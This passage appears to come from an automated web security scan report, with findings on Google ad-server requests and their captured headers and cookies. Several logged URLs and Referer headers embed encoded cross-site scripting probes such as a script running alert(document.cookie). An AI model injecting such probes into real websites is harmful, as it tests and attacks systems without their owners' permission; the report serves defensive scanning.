http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Emirates.com/JetBlue%26adT%3DFly%2BEmirates%2B%2526amp%253B%2BJetBlue%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.booking.com%26adT%3DHotels%2Bin%2BBeirut%26adU%3DGreatEyes.org%26adT%3DNashville%2BVision%2BCare%26adU%3Dwww.ArabLounge.com%26adT%3DLebanese%2BDating%2BSite%26gl%3DUS&usg=AFQjCNFeOfnvXzxGX6z6AyJJl1KudBTYcA

Request

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.60. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287

The response contains the following link to another domain:

http://ads.gmodules.com/gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F160x600.xml&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJUxlLD0-TYmZNJmSmgfe7tCWBra1nskBorr7ohHAjbcB8Ml0EAEYASChjJECOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgEOd3d3LmJlaXJ1dC5jb226AQoxNjB4NjAwX2FzyAEJ2gFwaHR0cDovL3d3dy5iZWlydXQuY29tL2Nzcy9ibHVlLzQ0MjllJTI1MjclMjUzYmFsZXJ0JTI1Mjhkb2N1bWVudC5jb29raWUlMjUyOSUyNTJmJTI1MmY1OWY4YzcxODVjNS9zZWFyY2gtYnRuLmdpZrgCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D1606490670571667390%26gglcreat%3D6191605240890117981%26sig%3DAGiWqtyQjTRM9BczgLcar8E6l2tKcvgahw%26client%3Dca-pub-3737471162188127%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBJUxlLD0-TYmZNJmSmgfe7tCWBra1nskBorr7ohHAjbcB8Ml0EAEYASChjJECOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgEOd3d3LmJlaXJ1dC5jb226AQoxNjB4NjAwX2FzyAEJ2gFwaHR0cDovL3d3dy5iZWlydXQuY29tL2Nzcy9ibHVlLzQ0MjllJTI1MjclMjUzYmFsZXJ0JTI1Mjhkb2N1bWVudC5jb29raWUlMjUyOSUyNTJmJTI1MmY1OWY4YzcxODVjNS9zZWFyY2gtYnRuLmdpZrgCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DMKF7h87fTQU%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=reno%20hotels&up_city=Washington&up_region=US-DC&up_lat=38.90&up_long=-77.04

Request

Response

20.61. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.splunk.com/unixandlinux%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHwiSYCg8DNdEf6CiHx-tS-NFhHlA

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 21:59:43 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4614

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg">
...[SNIP]...
iWqtwVaBMYerim38Cv9A9Lre7D2RM3Eg%26client%3Dca-pub-8731857490252326%26adurl%3Dhttp://www.splunk.com/download%253Fac%253DAdwords_Unix%2526_kk%253Dlinux%2526_kt%253Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBwLj1T_Y9TZO2CtSfmgfw75DlBvefnvIBgYPJkRTAjbcBkM9TEAEYASD3z_UBOABQ7vCaz_n_____AWDJhqOH1KOAEKABvZ6Q-QOyARBsaW51eC5tYXJ1aG4uY29tugEJNzI4eDkwX2FzyAEE2gEkaHR0cDovL2xpbnV4Lm1hcnVobi5jb20vc2VjL2F1Yi5odG1s4AECgAIBuAIYyALv4-EHqAMB6APgBegDhgf1AwAAAMQ%26num%3D1%26sig%3DAGiWqtwVaBMYerim38Cv9A9Lre7D2RM3Eg%26client%3Dca-pub-8731857490252326%26adurl%3Dhttp://www.splunk.com/download%253Fac%253DAdwords_Unix%2526_kk%253Dlinux%2526_kt%253Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.splunk.com/unixandlinux%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHwiSYCg8DNdEf6CiHx-tS-NFhHlA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.62. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027173&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885027175&frm=0&adk=3874739809&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=6&xpc=IUe7DiHpOK&p=http%3A//www25.big.jp

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dkabunogakkou.com%26adT%3D%25E6%2597%25A5%25E6%259C%25AC%25E6%25A0%25AA%25E3%2580%2581%25E3%2582%2586%25E3%2582%258B%25E3%2582%2584%25E3%2581%258B%25E3%2581%25AB%25E4%25B8%258A%25E6%2598%2587%26adU%3Dwww.tokaicom.co.jp%26adT%3Dtokaicom%25E6%2583%2585%25E5%25A0%25B1%25E9%2580%259A%25E4%25BF%25A1%25E6%25A9%259F%25E5%2599%25A8%26adU%3Dtenso.com%26adT%3D%25E6%25B5%25B7%25E5%25A4%2596%25E5%259C%25A8%25E4%25BD%258F%25E3%2581%25A7%25E5%259B%25B0%25E3%2582%258B%25E4%25BA%258B%25E3%2581%25A3%25E3%2581%25A6%253F%26adU%3Dwww.gmr.co.jp/%26adT%3DYahooBB%25E3%2581%25AE%25E3%2581%258A%25E7%2594%25B3%25E8%25BE%25BC%25E3%2581%25AF%25E3%2581%2593%25E3%2581%25A1%25E3%2582%2589%26gl%3DUS&usg=AFQjCNH5aw0UrVsvitnZOSnXMYCbP5gEQw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=280&slotname=6395072094&w=336&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027173&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295885027175&frm=0&adk=3874739809&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=1&dtd=6&xpc=IUe7DiHpOK&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.63. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990839&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969271051&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969271079&frm=0&adk=1607234649&ga_vid=2127064332.1295969271&ga_sid=1295969271&ga_hid=1216935366&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=63&xpc=st7MB22LR5&p=http%3A//cdn.cloudscan.us

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/bmwusa.com-xss-cwe-79.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.russelbmw.com%26adT%3DUsed%2BBMW%2BSales%2BEvent%26adU%3Dwww.bmwofsterling.com%26adT%3DNew%2B2011%2B5%2BSeries%26adU%3Dwww.AlexandriaBavarian.com%26adT%3DAlexandria%2BBavarian%2BServ.%26gl%3DUS&usg=AFQjCNEc7TNKhs89nujXXf9-TE6rvk1j0A

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990839&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969271051&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969271079&frm=0&adk=1607234649&ga_vid=2127064332.1295969271&ga_sid=1295969271&ga_hid=1216935366&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=63&xpc=st7MB22LR5&p=http%3A//cdn.cloudscan.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.cloudscan.us/examples/html/bmwusa.com-xss-cwe-79.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.64. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917035444&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917035474&frm=0&adk=1607234649&ga_vid=975275101.1295917036&ga_sid=1295917036&ga_hid=991236417&ga_fc=0&u_tz=-360&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=274&xpc=1bYNagbaIN&p=http%3A//cdn.cloudscan.us

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26adU%3Dwww.eEye.com/Scanner%26adT%3DeEye%2BVulnerability%2BScan%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&usg=AFQjCNFBjmrTRs6EAt3UwsQCPcnE2v68yw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938632&flash=10.1.103&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295917035444&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295917035474&frm=0&adk=1607234649&ga_vid=975275101.1295917036&ga_sid=1295917036&ga_hid=991236417&ga_fc=0&u_tz=-360&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=274&xpc=1bYNagbaIN&p=http%3A//cdn.cloudscan.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.65. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=0011327600&w=300&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916250&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880916252&frm=0&adk=2269993155&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=1&dtd=13&xpc=Z8iA45otF7&p=http%3A//www.x64bitdownload.com

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3Dwww.pctools.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNETZtlb8C-LQ09A0S2ULMyRKtciNw

Request

GET /pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=0011327600&w=300&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916250&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880916252&frm=0&adk=2269993155&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=1&dtd=13&xpc=Z8iA45otF7&p=http%3A//www.x64bitdownload.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.66. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070457&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885070450&frm=0&adk=2318622855&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=2&dtd=2&xpc=Rm5eYCJ1YN&p=http%3A//www25.big.jp

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(String.fromCharCode(88,83,83))%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dwww.imesh.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGzMY54De5fwfIw2VK9BuljS8qKdw

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906670&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885070457&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885070450&frm=0&adk=2318622855&ga_vid=161969690.1295885070&ga_sid=1295885070&ga_hid=1617968269&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F10&fu=0&ifi=2&dtd=2&xpc=Rm5eYCJ1YN&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.67. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4580112719386696&output=html&h=90&slotname=2469587526&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Ftweetmeme.com%2F&dt=1295907699384&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295907699412&frm=1&adk=3587140093&ga_vid=1600525813.1295907699&ga_sid=1295907699&ga_hid=33325925&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2529230422&eid=30143103&fu=0&ifi=1&dtd=39

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://tweetmeme.com/%26hl%3Den%26client%3Dca-pub-4580112719386696%26adU%3Dwww.JJKeller.com%26adT%3DJJ%2BKeller%2BVideo%2BTraining%26adU%3Dwww.macrooil.com%26adT%3DEmergency%2BFuel%2BProvider%26adU%3Dwww.StudyatAPU.com%26adT%3DEmergency%2BResponse%2BDegree%26gl%3DUS&usg=AFQjCNG9hCNLbjFP5ugqjZwXGCCm14Z-6A

Request

